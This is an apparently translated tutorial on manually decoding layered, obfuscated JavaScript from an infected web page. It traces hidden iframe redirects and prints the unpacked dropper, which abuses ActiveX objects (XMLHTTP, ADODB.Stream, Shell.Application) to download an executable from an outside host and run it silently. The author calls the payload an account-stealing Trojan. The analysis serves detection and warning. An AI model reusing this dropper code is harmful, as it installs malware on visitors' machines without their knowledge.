A must-read for JS developers: a reverse-thinking method for cracking all kinds of JavaScript encryption [Original]

Source: Internet
Author: User
Tags decrypt

Original article; if you reproduce it, please credit the source: Cloud Habitat Community.
I have found a reverse-thinking method that cracks many kinds of JavaScript encryption. If you have a good method of your own, please post it in the thread.
I recently came across a piece of code wrapped in about five layers of encryption. I will crack it through to the last step, without using any JavaScript decryption program.

Software used
1. Thunder, to download the page. If you browse to the page directly it will be executed and you will not see the source code.
2. Alternatively, Firefox, which can browse the site directly; because of the particular way Firefox behaves, this browser is also recommended.
First, the target URL: http://www.e9ad.cn/pcdd/80-806.htm
Download this page with Thunder, or browse to it with Firefox, to get the following code:

<script language=javascript>var dfqc=function(a){return String.fromCharCode(a^22)};document.write(dfqc(42)+dfqc(126)+...);</script>





To decrypt this, analyse it as follows.

Look at document.write(dfqc(42)+dfqc(126)...

The dfqc in dfqc(42) is the decryption function: var dfqc=function(a){return String.fromCharCode(a^22)}

I have worked out my decryption code as well, shown below. This method can crack a lot of similar code; take a look:


<html><body><div id=thes></div><script language=javascript>var dfqc=function(a){return String.fromCharCode(a^22)};document.getElementById('thes').innerText=dfqc(42)+dfqc(126)+...;</script></body></html>





The resulting decrypted code is:

<script>
function clear(){
source=document.body.firstChild.data;
document.open();
document.close();
document.title="GG";
document.body.innerHTML=source;
}</script>
<title>ad</title>
<body onload=clear() topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">
<!--
<iframe name="I1" src="8080.htm" marginwidth="1" marginheight="1" height="no" width="80"
scrolling="No" border="0" frameborder="0"></iframe>
-->
</body>
<SCRIPT>
<!--
window.defaultStatus="";
-->
</SCRIPT>
<iframe src=http://pop.*****.com/777/index.htm width=0 height=0></iframe>
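
The first-layer decode above can also be done without rendering the page at all. The following is an added example, not code from the original article: it reads the XOR key out of the decoder definition, decodes the dfqc(n) chain purely as text, and lists the iframe/script sources of the decoded layer. The sample input, the next.example.invalid host and the function names are constructed for illustration.

```javascript
// Locate "NAME=function(a){return String.fromCharCode(a^KEY)}" in the source text.
function findXorDecoder(src) {
  const re = /([A-Za-z_]\w*)\s*=\s*function\s*\(\s*(\w+)\s*\)\s*\{\s*return\s+String\.fromCharCode\s*\(\s*\2\s*\^\s*(\d+)\s*\)\s*;?\s*\}/;
  const m = re.exec(src);
  return m ? { name: m[1], key: Number(m[3]) } : null;
}

// Decode every NAME(<integer>) call in source order. The sample is only
// pattern-matched as text; none of it is evaluated.
function decodeChain(src) {
  const dec = findXorDecoder(src);
  if (!dec) throw new Error('no XOR/fromCharCode decoder found');
  const call = new RegExp('\\b' + dec.name + '\\s*\\(\\s*(\\d+)\\s*\\)', 'g');
  let text = '';
  for (const m of src.matchAll(call)) {
    text += String.fromCharCode(Number(m[1]) ^ dec.key);
  }
  return { key: dec.key, text };
}

// List the iframe/script sources in a decoded layer, flagging 0x0 frames.
function nextHops(html) {
  const hops = [];
  for (const m of html.matchAll(/<(iframe|script)\b([^>]*)>/gi)) {
    const src = /\bsrc\s*=\s*["']?\s*([^\s"'>]+)/i.exec(m[2]);
    if (!src) continue;
    const hidden = /\bwidth\s*=\s*["']?0\b/i.test(m[2]) &&
                   /\bheight\s*=\s*["']?0\b/i.test(m[2]);
    hops.push({ tag: m[1].toLowerCase(), url: src[1], hidden });
  }
  return hops;
}

// Constructed sample: a harmless layer encoded the same way (key 22).
const PLAIN = '<iframe src=http://next.example.invalid/a.htm width=0 height=0></iframe>';
const SAMPLE = '<script language=javascript>var dfqc=function(a){return ' +
  'String.fromCharCode(a^22)};document.write(' +
  Array.from(PLAIN, ch => 'dfqc(' + (ch.charCodeAt(0) ^ 22) + ')').join('+') +
  ');</script>';

const layer = decodeChain(SAMPLE);
console.log(layer.key, layer.text);
console.log(nextHops(layer.text));
```
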



Second, check http://www.e9ad.cn/pcdd/8080.htm and http://pop.*****.com/777/index.htm from the code above.

I found that the problem is in the iframe loaded at the bottom, so

downloading http://pop.*****.com/777/index.htm with the download tool gives the following code for that page:

<iframe src=http://cc.*****.com/wm/index.htm width=0 height=0></iframe>
<script src='http://s92.cnzz.com/stat.php?id=451144&web_id=451144' language='JavaScript'
charset='gb2312'></script>



Seeing this, you should be reminded of the similar code used by the many websites that sell traffic (this is traffic selling).

Third, continue by analysing http://cc.*****.com/wm/index.htm

Downloading this page with the download tool gives:

<script language=javascript src=1.js></script>

Next, download the JS file http://cc.*****.com/wm/1.js. I got this code:



eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('...',62,71,'...'.split('|'),0,{}))





Looking at the code above, you may think it cannot be decrypted. I searched and found that decryption code for it already exists and could be used for the analysis here, but using a decryption program is not the purpose of this article, so I use the following method:


<script>var str=(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('...',62,71,'...'.split('|'),0,{}));document.write(str);</script>





I came up with the method above after thinking for only a few seconds; I had not thought of it before. Now everyone can apply it in more situations.

First replace eval in the code with var str=..., then call document.write(str); to get the following code:

function gn(n){var number=Math.random()*n;return '~tmp'+'.tmp'}
try{
dl='http://cc.*****.com/wm/mm.exe';
var df=document.createElement("Object");
df.setAttribute("ClassID","clsid:bd96c556-65a3-11d0-983a-00c04fc29e36");
var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");
var s=df.CreateObject("ADODB.stream","");
s.type=1;
x.open("Get",dl,0);
x.send();
fname1=gn(10000);
var f=df.CreateObject("Scripting.FileSystemObject","");
var tmp=f.GetSpecialFolder(0);
fname1=f.BuildPath(tmp,fname1);
s.open();
s.write(x.responseBody);
s.SaveToFile(fname1,2);
s.close();
var q=df.CreateObject("Shell.Application","");
exp1=f.BuildPath(tmp+'\\system32','cmd.exe');
q.ShellExecute(exp1,'/C '+fname1,"","open",0)
}catch(i){i=1}
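
The eval-replacement step can likewise be done statically: the packed string and the |-separated word list are all the stub works from, so the same substitution can be repeated on the text without a browser. This is an added example, not code from the original article; the packed sample, its next.example.invalid host and the function names are constructed for illustration.

```javascript
// Encode a dictionary index the way the packer stub's e(c) does (radix <= 62).
function encodeIndex(n, radix) {
  const d = n % radix;
  const head = n < radix ? '' : encodeIndex(Math.floor(n / radix), radix);
  return head + (d > 35 ? String.fromCharCode(d + 29) : d.toString(36));
}

// Undo the escaping the packer applies inside its single-quoted literals.
function unquote(lit) {
  return lit.replace(/\\(.)/g, (_, ch) => (ch === 'n' ? '\n' : ch));
}

// Arguments of the stub call: }('payload',radix,count,'w0|w1|...'.split('|')
const ARGS = /\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:[^'\\]|\\.)*)'\s*\.split\(\s*'\|'\s*\)/;

// Rebuild the source the stub would hand to eval, by text substitution only.
function unpack(src) {
  const m = ARGS.exec(src);
  if (!m) throw new Error('no p,a,c,k,e,d argument list found');
  const radix = Number(m[2]);
  const count = Number(m[3]);
  const words = unquote(m[4]).split('|');
  if (words.length < count) throw new Error('dictionary shorter than count');
  const table = new Map();
  for (let i = 0; i < count; i++) {
    const token = encodeIndex(i, radix);
    table.set(token, words[i] || token); // empty entry: token stands for itself
  }
  return unquote(m[1]).replace(/\b\w+\b/g, t => (table.has(t) ? table.get(t) : t));
}

// Constructed sample (stub body omitted; only the argument list is parsed).
const PACKED = String.raw`eval(function(p,a,c,k,e,d){/* unpacker stub */}` +
  String.raw`('1 2=\'3://4.5.6/7.8\';9.a=2;b.c=0',62,13,` +
  String.raw`'|var|url|http|next|example|invalid|x|js|document|title|window|status'` +
  String.raw`.split('|'),0,{}))`;

console.log(unpack(PACKED));
```

The empty first dictionary entry in the sample mirrors the empty entries in the packed file above: a token with no word stands for itself, which is how numeric literals survive packing.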



Now we can see http://cc.*****.com/wm/mm.exe. Download it first, and remember to look at the size of what you download: virus files are generally very small.

First rename mm.exe to mm.exe.txt, then open it to see the following code. Alas:

<script>window.location="/wm/mm.exe?QVYRR=AU6BKUDMTN1";</script>
<center></a></body>



See, this is the main thing: http://cc.*****.com/wm/mm.exe?Qvyrr=au6bkudmtn1

Then download it with the software; this is the virus file.

That completes it. The virus found appears to be an account-stealing Trojan. A lot of traffic is being sold online these days, so those of you who love playing games, please take note.

Of course, the JavaScript reverse-thinking method above can handle most encrypted JavaScript, and many other schemes already have decryption programs.

If you have a good method, please post it so that everyone can improve. Author: Reterry QQ: 461478385

